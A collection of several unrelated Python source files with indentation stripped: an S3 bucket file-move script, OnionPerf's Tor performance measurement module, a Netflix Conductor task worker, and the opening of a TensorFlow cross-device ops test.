import errno
import logging
import os
import threading
import time
import boto3
import yaml
from botocore.client import Config
from pykit import jobq
ITER_STATUS = {
'total': 0,
'total_size': 0,
'marker': '',
}
MOVE_STATUS = {
'total': 0,
'total_size': 0,
}
PERM_TO_ARG = {
'READ': 'GrantRead',
'READ_ACP': 'GrantReadACP',
'WRITE': 'GrantWrite',
'WRITE_ACP': 'GrantWriteACP',
'FULL_CONTROL': 'GrantFullControl',
}
class MoveFileError(Exception):
pass
def _thread(func, args):
th = threading.Thread(target=func, args=args)
th.daemon = True
th.start()
return th
def _mkdir(path):
try:
os.makedirs(path, 0755)
except OSError as e:
if e[0] == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def load_conf_from_file(path):
with open(path) as f:
conf = yaml.safe_load(f.read())
return conf
def boto_client():
session = boto3.session.Session()
client = session.client(
's3',
use_ssl=False,
aws_access_key_id=cnf['ACCESS_KEY'],
aws_secret_access_key=cnf['SECRET_KEY'],
config=Config(signature_version='s3v4'),
region_name='us-east-1',
endpoint_url=cnf['ENDPOINT'],
)
return client
def add_logger():
log_file = os.path.join(cnf['LOG_DIR'], 'move-file-log-for-' +
cnf['SRC_BUCKET'] + '.log')
log = logging.getLogger()
log.setLevel(logging.INFO)
file_handler = logging.FileHandler(log_file)
formatter = logging.Formatter('[%(asctime)s, %(levelname)s] %(message)s')
file_handler.setFormatter(formatter)
log.addHandler(file_handler)
return log
def iter_file():
num_limit = cnf['NUM_LIMIT']
start_marker = cnf['START_MARKER']
end_marker = cnf['END_MARKER']
prefix = cnf['OLD_PREFIX']
marker = start_marker
n = 0
try:
while True:
resp = s3_client.list_objects(
Bucket=cnf['SRC_BUCKET'],
Marker=marker,
Prefix=prefix,
)
if 'Contents' not in resp:
print 'list file end'
break
for content in resp['Contents']:
if num_limit is not None and n >= num_limit:
print 'list file limit reached'
return
if end_marker is not None and content['Key'] >= end_marker:
print 'list file end marker reached'
return
marker = content['Key']
ITER_STATUS['total'] += 1
ITER_STATUS['total_size'] += content['Size']
ITER_STATUS['marker'] = marker
yield {
'key_name': content['Key'],
'size': content['Size'],
}
n += 1
except Exception as e:
logger.exception('failed to iter file: ' + repr(e))
print 'iter file exception: ' + repr(e)
def change_key_name(old_key_name):
old_prefix_len = len(cnf['OLD_PREFIX'])
new_key_name = cnf['NEW_PREFIX'] + old_key_name[old_prefix_len:]
return new_key_name
def build_grants_args(acl_resp):
grants = {
'READ': {
'CanonicalUser': [],
'Group': [],
},
'READ_ACP': {
'CanonicalUser': [],
'Group': [],
},
'WRITE': {
'CanonicalUser': [],
'Group': [],
},
'WRITE_ACP': {
'CanonicalUser': [],
'Group': [],
},
'FULL_CONTROL': {
'CanonicalUser': [],
'Group': [],
},
}
for grant in acl_resp['Grants']:
permission = grant['Permission']
grantee = grant['Grantee']
if grantee['Type'] == 'Group':
grants[permission]['Group'].append(grantee['URI'])
elif grantee['Type'] == 'CanonicalUser':
grants[permission]['CanonicalUser'].append(grantee['ID'])
grant_args = {}
for permission, grantees in grants.iteritems():
arg_value = ','.join(
['uri="%s"' % group for group in grantees['Group']] +
['id="%s"' % user for user in grantees['CanonicalUser']])
if arg_value != '':
grant_args[PERM_TO_ARG[permission]] = arg_value
return grant_args
def get_old_file_acl_grants_args(old_key_name):
acl_resp = s3_client.get_object_acl(
Bucket=cnf['SRC_BUCKET'],
Key=old_key_name,
)
grant_args = build_grants_args(acl_resp)
return grant_args
def copy_file(result):
old_key_name = result['file_info']['key_name']
new_key_name = change_key_name(old_key_name)
try:
if cnf['COPY_ACL']:
grant_args = get_old_file_acl_grants_args(old_key_name)
else:
grant_args = {}
except Exception as e:
logger.exception('failed to get acl of file: ' + old_key_name)
result['state'] = 'get_acl_error'
raise MoveFileError(repr(e))
if 'GrantWrite' in grant_args:
grant_args.pop('GrantWrite')
logger.info('copy file: %s/%s to %s/%s' %
(cnf['SRC_BUCKET'], old_key_name,
cnf['DEST_BUCKET'], new_key_name))
try:
s3_client.copy_object(
Bucket=cnf['DEST_BUCKET'],
Key=new_key_name,
CopySource='%s/%s' % (cnf['SRC_BUCKET'], old_key_name),
**grant_args
)
except Exception as e:
logger.exception('failed to copy file: ' + old_key_name)
result['state'] = 'copy_object_error'
raise MoveFileError(repr(e))
def delete_old_file(result):
old_key_name = result['file_info']['key_name']
logger.info('delete file: %s/%s' %
(cnf['SRC_BUCKET'], old_key_name))
try:
s3_client.delete_object(
Bucket=cnf['SRC_BUCKET'],
Key=old_key_name,
)
except Exception as e:
logger.exception('failed to delete file: ' + old_key_name)
result['state'] = 'delete_object_error'
raise MoveFileError(repr(e))
def move_one_file(file_info):
result = {
'file_info': file_info,
}
try:
copy_file(result)
if cnf['DELETE'] == True:
delete_old_file(result)
result['state'] = 'succeed'
return result
except MoveFileError as e:
return result
except Exception as e:
logger.exception('got exception when move one file: ' + repr(e))
result['state'] = 'exception'
return result
def update_stat(result):
MOVE_STATUS['total'] += 1
MOVE_STATUS['total_size'] += result['file_info']['size']
state = result['state']
if state not in MOVE_STATUS:
MOVE_STATUS[state] = 0
MOVE_STATUS[state] += 1
def report_state():
print ('iter status: total: %d, total_size: %d, marker: %s' %
(ITER_STATUS['total'], ITER_STATUS['total_size'],
ITER_STATUS['marker']))
print 'move status: ' + repr(MOVE_STATUS)
print ''
def report(sess):
while not sess['stop']:
report_state()
time.sleep(cnf['REPORT_INTERVAL'])
def move_files():
if cnf['SRC_BUCKET'] == cnf['DEST_BUCKET']:
if (cnf['OLD_PREFIX'].startswith(cnf['NEW_PREFIX'])
or cnf['NEW_PREFIX'].startswith(cnf['OLD_PREFIX'])):
print (('error: OLD_PREFIX: %s, or NEW_PREFIX: %s, ' +
'should not starts with the other') %
(cnf['OLD_PREFIX'], cnf['NEW_PREFIX']))
return
sess = {'stop': False}
report_th = _thread(report, (sess,))
jobq.run(iter_file(),
[(move_one_file, cnf['THREADS_NUM']),
(update_stat, 1),
])
sess['stop'] = True
report_th.join()
report_state()
def load_cli_args():
parser = argparse.ArgumentParser(description='move file')
parser.add_argument('cmd', type=str,
choices=['move_files', 'move_one_file'],
help='move one file by name or move files by prefix')
parser.add_argument('--access_key', type=str,
help='set user access key')
parser.add_argument('--secret_key', type=str,
help='set user secret key')
parser.add_argument('--src_bucket', type=str,
help='the bucket which the source file in')
parser.add_argument('--dest_bucket', type=str,
help='the bucket which the file will be move to')
parser.add_argument('--old_prefix', type=str,
help=('set the old prefix when moving files by prefix, ' +
'set the source file name when moving one file'))
parser.add_argument('--new_prefix', type=str,
help=('set the new prefix when moving files by prefix, ' +
'set the destination file name when moving one file'))
parser.add_argument('--conf_path', type=str,
help='set the path of the conf path')
args = parser.parse_args()
return args
def load_conf(args):
conf_path = args.conf_path or '../conf/move_file.yaml'
conf = load_conf_from_file(conf_path)
conf_keys = ('cmd',
'access_key',
'secret_key',
'src_bucket',
'dest_bucket',
'old_prefix',
'new_prefix',
)
for k in conf_keys:
v = getattr(args, k)
if v is not None:
conf[k.upper()] = v
return conf
if __name__ == "__main__":
args = load_cli_args()
cnf = load_conf(args)
_mkdir(cnf['LOG_DIR'])
logger = add_logger()
logger.info('args={a}'.format(a=args))
logger.info('conf={c}'.format(c=cnf))
s3_client = boto_client()
if cnf['CMD'] == 'move_one_file':
file_info = {
'key_name': cnf['OLD_PREFIX'],
}
print move_one_file(file_info)
elif cnf['CMD'] == 'move_files':
move_files()
|
measurement.py | '''
OnionPerf
Authored by Rob Jansen, 2015
See LICENSE for licensing information
'''
import os, traceback, subprocess, threading, Queue, logging, time, datetime, re, shlex
from lxml import etree
# stem imports
from stem.util import str_tools
from stem.control import Controller
from stem.version import Version, Requirement, get_system_tor_version
from stem import __version__ as stem_version
# onionperf imports
import analysis, monitor, model, util
def generate_docroot_index(docroot_path):
root = etree.Element("files")
filepaths = [f for f in os.listdir(docroot_path) if os.path.isfile(os.path.abspath('/'.join([docroot_path, f])))]
for filename in filepaths:
e = etree.SubElement(root, "file")
e.set("name", filename)
with open("{0}/index.xml".format(docroot_path), 'wb') as f: print >> f, etree.tostring(root, pretty_print=True, xml_declaration=True)
def readline_thread_task(instream, q):
# wait for lines from stdout until the EOF
for line in iter(instream.readline, b''): q.put(line)
def watchdog_thread_task(cmd, cwd, writable, done_ev, send_stdin, ready_search_str, ready_ev):
# launch or re-launch our sub process until we are told to stop
# if we fail too many times in too short of time, give up and exit
failure_times = []
pause_time_seconds = 0
while done_ev.is_set() is False:
if pause_time_seconds > 0:
time.sleep(pause_time_seconds)
stdin_handle = subprocess.PIPE if send_stdin is not None else None
subp = subprocess.Popen(shlex.split(cmd), cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=stdin_handle)
# send some data to stdin if requested
if send_stdin is not None:
subp.stdin.write(send_stdin)
subp.stdin.close()
# wait for a string to appear in stdout if requested
if ready_search_str is not None:
boot_re = re.compile(ready_search_str)
for line in iter(subp.stdout.readline, b''):
writable.write(line)
if boot_re.search(line):
break # got it!
# now the process is running *and* 'ready'
if ready_ev is not None:
ready_ev.set()
# a helper will block on stdout and return lines back to us in a queue
stdout_q = Queue.Queue()
t = threading.Thread(target=readline_thread_task, args=(subp.stdout, stdout_q))
t.start()
# collect output from the helper and write it, continuously checking to make
# sure that the subprocess is still alive and the master doesn't want us to quit
while subp.poll() is None and done_ev.is_set() is False:
try:
# collect lines until the queue is empty for a full second
while True:
line = stdout_q.get(True, 1)
writable.write(line)
except Queue.Empty:
# the queue is empty and the get() timed out, recheck loop conditions
continue
# either the process died, or we should shut down gracefully
# if the process is still running, stop it
if subp.poll() is None:
# we collected no exit code, so it is still running
subp.terminate()
subp.wait()
elif done_ev.is_set():
logging.info("command '{}' finished as expected".format(cmd))
else:
logging.warning("command '{}' finished before expected".format(cmd))
now = time.time()
# remove failures that happened more than an hour ago
while len(failure_times) > 0 and failure_times[0] < (now-3600.0):
failure_times.pop(0)
# add a new failure that just occurred
failure_times.append(now)
pause_time_seconds = 30
# the subp should be stopped now, flush any remaining lines
#subp.stdout.close() # results in concurrent write error
# the helper should stop since stdout was closed
t.join()
# helper thread is done, make sure we drain the remaining lines from the stdout queue
while not stdout_q.empty():
writable.write(stdout_q.get_nowait())
# if we have too many failures, exit the watchdog to propogate the error up
if len(failure_times) > 10:
break
# now loop around: either the master asked us to stop, or the subp died and we relaunch it
# too many failures, or master asked us to stop, close the writable before exiting thread
writable.close()
def logrotate_thread_task(writables, tgen_writable, torctl_writable, docroot, nickname, done_ev):
next_midnight = None
while not done_ev.wait(1):
# get time
utcnow = datetime.datetime.utcnow()
# setup the next expiration time (midnight tonight)
if next_midnight is None:
next_midnight = datetime.datetime(utcnow.year, utcnow.month, utcnow.day, 23, 59, 59)
# make sure we are not already past the above time today
if (next_midnight - utcnow).total_seconds() < 0:
next_midnight -= datetime.timedelta(1) # subtract 1 day
# if we are past midnight, launch the rotate task
if (next_midnight - utcnow).total_seconds() < 0:
# handle the general writables we are watching
for w in writables:
w.rotate_file(filename_datetime=next_midnight)
# handle tgen and tor writables specially, and do analysis
if tgen_writable is not None or torctl_writable is not None:
try:
# get our public ip address, do this every night in case it changes
public_measurement_ip_guess = util.get_ip_address()
# set up the analysis object with our log files
anal = analysis.Analysis(nickname=nickname, ip_address=public_measurement_ip_guess)
if tgen_writable is not None:
anal.add_tgen_file(tgen_writable.rotate_file(filename_datetime=next_midnight))
if torctl_writable is not None:
anal.add_torctl_file(torctl_writable.rotate_file(filename_datetime=next_midnight))
# run the analysis, i.e. parse the files
anal.analyze(do_simple=False, date_filter=next_midnight.date())
# save the results in onionperf and torperf format in the twistd docroot
anal.save(output_prefix=docroot, do_compress=True)
anal.export_torperf_version_1_1(output_prefix=docroot, do_compress=False)
# update the xml index in docroot
generate_docroot_index(docroot)
except Exception as e:
logging.warning("Caught and ignored exception in TorPerf log parser: {0}".format(repr(e)))
logging.warning("Formatted traceback: {0}".format(traceback.format_exc()))
# reset our timer
next_midnight = None
class Measurement(object):
def __init__(self, tor_bin_path, tgen_bin_path, twistd_bin_path, datadir_path, nickname):
self.tor_bin_path = tor_bin_path
self.tgen_bin_path = tgen_bin_path
self.twistd_bin_path = twistd_bin_path
self.datadir_path = datadir_path
self.nickname = nickname
self.threads = None
self.done_event = None
self.hs_service_id = None
self.twisted_docroot = None
def run(self, do_onion=True, do_inet=True, client_tgen_listen_port=58888, client_tgen_connect_ip='0.0.0.0', client_tgen_connect_port=8080, client_tor_ctl_port=59050, client_tor_socks_port=59000,
server_tgen_listen_port=8080, server_tor_ctl_port=59051, server_tor_socks_port=59001, twistd_port=50080):
'''
only `server_tgen_listen_port` and `twistd_port` are "public" and need to be opened on the firewall.
if `client_tgen_connect_port` != `server_tgen_listen_port`, then you should have installed a forwarding rule in the firewall.
all ports need to be unique though, and unique among multiple onionperf instances.
here are some sane defaults:
client_tgen_listen_port=58888, client_tgen_connect_port=8080, client_tor_ctl_port=59050, client_tor_socks_port=59000,
server_tgen_listen_port=8080, server_tor_ctl_port=59051, server_tor_socks_port=59001, twistd_port=50080
'''
self.threads = []
self.done_event = threading.Event()
# if ctrl-c is pressed, shutdown child processes properly
try:
# make sure stem and Tor supports ephemeral HS (version >= 0.2.7.1-alpha)
# and also the NEWNYM mode that clears descriptor cache (version >= 0.2.7.3-rc)
if do_onion:
try:
tor_version = get_system_tor_version(self.tor_bin_path)
if tor_version < Requirement.ADD_ONION or tor_version < Version('0.2.7.3-rc'): # ADD_ONION is a stem 1.4.0 feature
logging.warning("OnionPerf in onion mode requires Tor version >= 0.2.7.3-rc, you have {0}, aborting".format(tor_version))
return
except:
logging.warning("OnionPerf in onion mode requires stem version >= 1.4.0, you have {0}, aborting".format(stem_version))
return
logging.info("Bootstrapping started...")
logging.info("Log files for the client and server processes will be placed in {0}".format(self.datadir_path))
general_writables = []
tgen_client_writable, torctl_client_writable = None, None
if do_onion or do_inet:
general_writables.append(self.__start_tgen_server(server_tgen_listen_port))
if do_onion:
tor_writable, torctl_writable = self.__start_tor_server(server_tor_ctl_port, server_tor_socks_port, {client_tgen_connect_port:server_tgen_listen_port})
general_writables.append(tor_writable)
general_writables.append(torctl_writable)
if do_onion or do_inet:
tor_writable, torctl_client_writable = self.__start_tor_client(client_tor_ctl_port, client_tor_socks_port)
general_writables.append(tor_writable)
server_urls = []
if do_onion and self.hs_service_id is not None:
server_urls.append("{0}.onion:{1}".format(self.hs_service_id, client_tgen_connect_port))
if do_inet:
connect_ip = client_tgen_connect_ip if client_tgen_connect_ip != '0.0.0.0' else util.get_ip_address()
server_urls.append("{0}:{1}".format(connect_ip, client_tgen_connect_port))
if do_onion or do_inet:
assert len(server_urls) > 0
tgen_client_writable = self.__start_tgen_client(server_urls, client_tgen_listen_port, client_tor_socks_port)
general_writables.append(self.__start_twistd(twistd_port))
self.__start_log_processors(general_writables, tgen_client_writable, torctl_client_writable)
logging.info("Bootstrapping finished, entering heartbeat loop")
time.sleep(1)
while True:
# TODO add status update of some kind? maybe the number of files in the twistd directory?
# logging.info("Heartbeat: {0} downloads have completed successfully".format(self.__get_download_count(tgen_client_writable.filename)))
if self.__is_alive():
logging.info("All helper processes seem to be alive :)")
else:
logging.warning("Some parallel components failed too many times or have died :(")
logging.info("We are in a broken state, giving up and exiting now")
break
logging.info("Next main process heartbeat is in 1 hour (helper processes run on their own schedule)")
logging.info("press CTRL-C for graceful shutdown...")
time.sleep(3600)
else:
logging.info("No measurement mode set, nothing to do")
except KeyboardInterrupt:
logging.info("Interrupt received, please wait for graceful shutdown")
self.__is_alive()
finally:
logging.info("Cleaning up child processes now...")
if self.hs_service_id is not None:
try:
with Controller.from_port(port=self.hs_control_port) as torctl:
torctl.authenticate()
torctl.remove_ephemeral_hidden_service(self.hs_service_id)
except: pass # this fails to authenticate if tor proc is dead
# logging.disable(logging.INFO)
self.done_event.set()
for t in self.threads:
logging.info("Joining {0} thread...".format(t.getName()))
t.join()
time.sleep(1)
# logging.disable(logging.NOTSET)
logging.info("Child processes terminated")
logging.info("Child process cleanup complete!")
logging.info("Exiting")
def __start_log_processors(self, general_writables, tgen_writable, torctl_writable):
# rotate the log files, and then parse out the torperf measurement data
logrotate_args = (general_writables, tgen_writable, torctl_writable, self.twisted_docroot, self.nickname, self.done_event)
logrotate = threading.Thread(target=logrotate_thread_task, name="logrotate", args=logrotate_args)
logrotate.start()
self.threads.append(logrotate)
def __start_tgen_client(self, server_urls, tgen_port, socks_port):
return self.__start_tgen("client", tgen_port, socks_port, server_urls)
def __start_tgen_server(self, tgen_port):
return self.__start_tgen("server", tgen_port)
def __start_tgen(self, name, tgen_port, socks_port=None, server_urls=None):
logging.info("Starting TGen {0} process on port {1}...".format(name, tgen_port))
tgen_datadir = "{0}/tgen-{1}".format(self.datadir_path, name)
if not os.path.exists(tgen_datadir): os.makedirs(tgen_datadir)
tgen_confpath = "{0}/tgen.graphml.xml".format(tgen_datadir)
if os.path.exists(tgen_confpath): os.remove(tgen_confpath)
if socks_port is None:
model.ListenModel(tgen_port="{0}".format(tgen_port)).dump_to_file(tgen_confpath)
logging.info("TGen server running at 0.0.0.0:{0}".format(tgen_port))
else:
model.TorperfModel(tgen_port="{0}".format(tgen_port), tgen_servers=server_urls, socksproxy="127.0.0.1:{0}".format(socks_port)).dump_to_file(tgen_confpath)
tgen_logpath = "{0}/onionperf.tgen.log".format(tgen_datadir)
tgen_writable = util.FileWritable(tgen_logpath)
logging.info("Logging TGen {1} process output to {0}".format(tgen_logpath, name))
tgen_cmd = "{0} {1}".format(self.tgen_bin_path, tgen_confpath)
tgen_args = (tgen_cmd, tgen_datadir, tgen_writable, self.done_event, None, None, None)
tgen_watchdog = threading.Thread(target=watchdog_thread_task, name="tgen_{0}_watchdog".format(name), args=tgen_args)
tgen_watchdog.start()
self.threads.append(tgen_watchdog)
return tgen_writable
def __start_twistd(self, twistd_port):
logging.info("Starting Twistd server process on port {0}...".format(twistd_port))
twisted_datadir = "{0}/twistd".format(self.datadir_path)
if not os.path.exists(twisted_datadir): os.makedirs(twisted_datadir)
twisted_logpath = "{0}/onionperf.twisted.log".format(twisted_datadir)
twisted_writable = util.FileWritable(twisted_logpath)
logging.info("Logging Twisted process output to {0}".format(twisted_logpath))
twisted_docroot = "{0}/docroot".format(twisted_datadir)
if not os.path.exists(twisted_docroot): os.makedirs(twisted_docroot)
generate_docroot_index(twisted_docroot)
self.twisted_docroot = twisted_docroot
twisted_cmd = "{0} -n -l - web --port {1} --path {2} --mime-type=None".format(self.twistd_bin_path, twistd_port, twisted_docroot)
twisted_args = (twisted_cmd, twisted_datadir, twisted_writable, self.done_event, None, None, None)
twisted_watchdog = threading.Thread(target=watchdog_thread_task, name="twistd_watchdog", args=twisted_args)
twisted_watchdog.start()
self.threads.append(twisted_watchdog)
logging.info("Twistd web server running at 0.0.0.0:{0}".format(twistd_port))
return twisted_writable
def __start_tor_client(self, control_port, socks_port):
return self.__start_tor("client", control_port, socks_port)
def __start_tor_server(self, control_port, socks_port, hs_port_mapping):
return self.__start_tor("server", control_port, socks_port, hs_port_mapping)
def __start_tor(self, name, control_port, socks_port, hs_port_mapping=None):
logging.info("Starting Tor {0} process with ControlPort={1}, SocksPort={2}...".format(name, control_port, socks_port))
tor_datadir = "{0}/tor-{1}".format(self.datadir_path, name)
if not os.path.exists(tor_datadir): os.makedirs(tor_datadir)
tor_config_template = "ORPort 0\nDirPort 0\nControlPort {0}\nSocksPort {1}\nSocksListenAddress 127.0.0.1\nClientOnly 1\n\
WarnUnsafeSocks 0\nSafeLogging 0\nMaxCircuitDirtiness 60 seconds\nUseEntryGuards 0\nDataDirectory {2}\nLog INFO stdout\n"
tor_config = tor_config_template.format(control_port, socks_port, tor_datadir)
tor_logpath = "{0}/onionperf.tor.log".format(tor_datadir)
tor_writable = util.FileWritable(tor_logpath)
logging.info("Logging Tor {0} process output to {1}".format(name, tor_logpath))
# from stem.process import launch_tor_with_config
# tor_subp = launch_tor_with_config(tor_config, tor_cmd=self.tor_bin_path, completion_percent=100, init_msg_handler=None, timeout=None, take_ownership=False)
tor_cmd = "{0} -f -".format(self.tor_bin_path)
tor_stdin_bytes = str_tools._to_bytes(tor_config)
tor_ready_str = "Bootstrapped 100"
tor_ready_ev = threading.Event()
tor_args = (tor_cmd, tor_datadir, tor_writable, self.done_event, tor_stdin_bytes, tor_ready_str, tor_ready_ev)
tor_watchdog = threading.Thread(target=watchdog_thread_task, name="tor_{0}_watchdog".format(name), args=tor_args)
tor_watchdog.start()
self.threads.append(tor_watchdog)
# wait until Tor finishes bootstrapping
tor_ready_ev.wait()
torctl_logpath = "{0}/onionperf.torctl.log".format(tor_datadir)
torctl_writable = util.FileWritable(torctl_logpath)
logging.info("Logging Tor {0} control port monitor output to {1}".format(name, torctl_logpath))
# give a few seconds to make sure Tor had time to start listening on the control port
time.sleep(3)
torctl_events = [e for e in monitor.get_supported_torctl_events() if e not in ['DEBUG', 'INFO', 'NOTICE', 'WARN', 'ERR']]
newnym_interval_seconds = 300
torctl_args = (control_port, torctl_writable, torctl_events, newnym_interval_seconds, self.done_event)
torctl_helper = threading.Thread(target=monitor.tor_monitor_run, name="torctl_{0}_helper".format(name), args=torctl_args)
torctl_helper.start()
self.threads.append(torctl_helper)
if hs_port_mapping is not None:
logging.info("Creating ephemeral hidden service...")
with Controller.from_port(port=control_port) as torctl:
torctl.authenticate()
response = torctl.create_ephemeral_hidden_service(hs_port_mapping, detached=True, await_publication=True)
self.hs_service_id = response.service_id
self.hs_control_port = control_port
logging.info("Ephemeral hidden service is available at {0}.onion".format(response.service_id))
return tor_writable, torctl_writable
def __get_download_count(self, tgen_logpath):
count = 0
if tgen_logpath is not None and os.path.exists(tgen_logpath):
with open(tgen_logpath, 'r') as fin:
for line in fin:
if re.search("transfer-complete", line) is not None:
count += 1
return count
def __is_alive(self):
all_alive = True
for t in self.threads:
t_name = t.getName()
if t.is_alive():
logging.info("{0} is alive".format(t_name))
else:
logging.warning("{0} is dead!".format(t_name))
all_alive = False
return all_alive
|
ConductorWorker.py | #
# Copyright 2017 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, absolute_import
import sys
import time
from conductor.conductor import WFClientMgr
from threading import Thread
import socket
from enum import Enum
hostname = socket.gethostname()
class TaskStatus(Enum):
IN_PROGRESS = 'IN_PROGRESS'
FAILED = 'FAILED'
FAILED_WITH_TERMINAL_ERROR = 'FAILED_WITH_TERMINAL_ERROR'
COMPLETED = 'COMPLETED'
def __str__(self):
return str(self.value)
class ConductorWorker:
"""
Main class for implementing Conductor Workers
A conductor worker is a separate system that executes the various
tasks that the conductor server queues up for execution. The worker
can run on the same instance as the server or on a remote instance.
The worker generally provides a wrapper around some function that
performs the actual execution of the task. The function that is
being executed must return a `dict` with the `status`, `output` and
`log` keys. If these keys are not present, the worker will raise an
Exception after completion of the task.
The start method is used to begin continous polling and execution
of the tasks that the conductor server makes available. The same
script can run multiple workers using the wait argument. For more
details, view the start method
"""
def __init__(self, server_url, thread_count, polling_interval, worker_id=None, headers=None):
"""
Parameters
----------
server_url: str
The url to the server hosting the conductor api.
Ex: 'http://localhost:8080/api'
thread_count: int
The number of threads that will be polling for and
executing tasks in case of using the start method.
polling_interval: float
The number of seconds that each worker thread will wait
between polls to the conductor server.
worker_id: str, optional
The worker_id of the worker that is going to execute the
task. For further details, refer to the documentation
By default, it is set to hostname of the machine
"""
wfcMgr = WFClientMgr(server_url, headers=headers)
self.workflowClient = wfcMgr.workflowClient
self.taskClient = wfcMgr.taskClient
self.thread_count = thread_count
self.polling_interval = polling_interval
self.worker_id = worker_id or hostname
@staticmethod
def task_result(status: TaskStatus, output=None, logs=None, reasonForIncompletion=None):
"""
Get task result
Parameters
----------
status: TaskStatus
The status of the task
Ex: TaskStatus.COMPLETED
output: dict
results of task processing
logs: list
log list
reasonForIncompletion: str, optional
the reason for not completing the task if any
"""
if logs is None:
logs = []
if output is None:
output = {}
ret = {
'status': status.__str__(),
'output': output,
'logs': logs
}
if reasonForIncompletion:
ret['reasonForIncompletion'] = reasonForIncompletion
return ret
def execute(self, task, exec_function):
try:
resp = exec_function(task)
if type(resp) is not dict or not all(key in resp for key in ('status', 'output', 'logs')):
raise Exception('Task execution function MUST return a response as a dict with status, output and logs fields')
task['status'] = resp['status']
task['outputData'] = resp['output']
task['logs'] = resp['logs']
if 'reasonForIncompletion' in resp:
task['reasonForIncompletion'] = resp['reasonForIncompletion']
self.taskClient.updateTask(task)
except Exception as err:
print(f'Error executing task: {exec_function.__name__} with error: {str(err)}')
task['status'] = 'FAILED'
task['outputData'] = {'error-message' : str(err) }
self.taskClient.updateTask(task)
def poll_and_execute(self, taskType, exec_function, domain=None):
while True:
time.sleep(float(self.polling_interval))
polled = self.taskClient.pollForTask(taskType, self.worker_id, domain)
if polled is not None:
self.taskClient.ackTask(polled['taskId'], self.worker_id)
self.execute(polled, exec_function)
def start(self, taskType, exec_function, wait, domain=None):
"""
start begins the continuous polling of the conductor server
Parameters
----------
taskType: str
The name of the task that the worker is looking to execute
exec_function: function
The function that the worker will execute. The function
must return a dict with the `status`, `output` and `logs`
keys present. If this is not present, an Exception will be
raised
wait: bool
Whether the worker will block execution of further code.
Since the workers are being run in daemon threads, when the
program completes execution, all the threads are destroyed.
Setting wait to True prevents the program from ending.
If multiple workers are being called from the same program,
all but the last start call but have wait set to False.
The last start call must always set wait to True. If a
single worker is being called, set wait to True.
domain: str, optional
The domain of the task under which the worker will run. For
further details refer to the conductor server documentation
By default, it is set to None
"""
print('Polling for task %s at a %f ms interval with %d threads for task execution, with worker id as %s' % (taskType, self.polling_interval * 1000, self.thread_count, self.worker_id))
for x in range(0, int(self.thread_count)):
thread = Thread(target=self.poll_and_execute, args=(taskType, exec_function, domain,))
thread.daemon = True
thread.start()
if wait:
while 1:
time.sleep(1)
def exc(taskType, inputData, startTime, retryCount, status, callbackAfterSeconds, pollCount):
print('Executing the function')
return {'status': 'COMPLETED', 'output': {}, 'logs': []}
def main():
cc = ConductorWorker('http://localhost:8080/api', 5, 0.1)
cc.start(sys.argv[1], exc, False)
cc.start(sys.argv[2], exc, True)
if __name__ == '__main__':
main()
|
cross_device_ops_test.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for CrossDeviceOps."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cluster_resolver as cluster_resolver_lib
from tensorflow.python.distribute import collective_util
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.util import nest
CollectiveReplicaLauncher = cross_device_utils.CollectiveReplicaLauncher
CommunicationImplementation = collective_util.CommunicationImplementation
ReduceOp = reduce_util.ReduceOp
IndexedSlicesValue = indexed_slices.IndexedSlicesValue
IndexedSlices = indexed_slices.IndexedSlices
def make_per_replica_value(value, devices):
"""Creates a `PerReplica` object whose values reside in `devices`.
Args:
value: a tensor-convertible value or a `IndexedSlicesValue`, or a callable
that takes one argument (`device_idx`) and should return the value that is
going to be created on devices[device_idx].
devices: a list of device strings to create `PerReplica` values on.
Returns:
A `PerReplica` object.
"""
values = []
for device_idx, device in enumerate(devices):
if callable(value):
v = value(device_idx)
elif isinstance(value, list):
v = value[device_idx]
else:
v = value
if isinstance(v, IndexedSlicesValue):
with ops.device(device):
values.append(
IndexedSlices(
values=array_ops.identity(v.values),
indices=array_ops.identity(v.indices),
dense_shape=array_ops.identity(v.dense_shape)))
else:
with ops.device(device):
values.append(array_ops.identity(v))
return value_lib.PerReplica(values)
def enable_collective_ops():
"""Enable collectives in the current process."""
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
context.context().configure_collective_ops(
collective_leader="'/job:worker/replica:0/task:0'")
config_proto = config_pb2.ConfigProto()
config_proto.experimental.collective_group_leader = (
"/job:worker/replica:0/task:0")
server_def = tensorflow_server_pb2.ServerDef(
cluster=cluster_resolver.cluster_spec().as_cluster_def(),
default_session_config=config_proto,
job_name=cluster_resolver.task_type,
task_index=cluster_resolver.task_id,
protocol=cluster_resolver.rpc_layer)
context.context().enable_collective_ops(server_def)
# Recover default flag values.
CollectiveReplicaLauncher._prefer_unique_instance_key = True
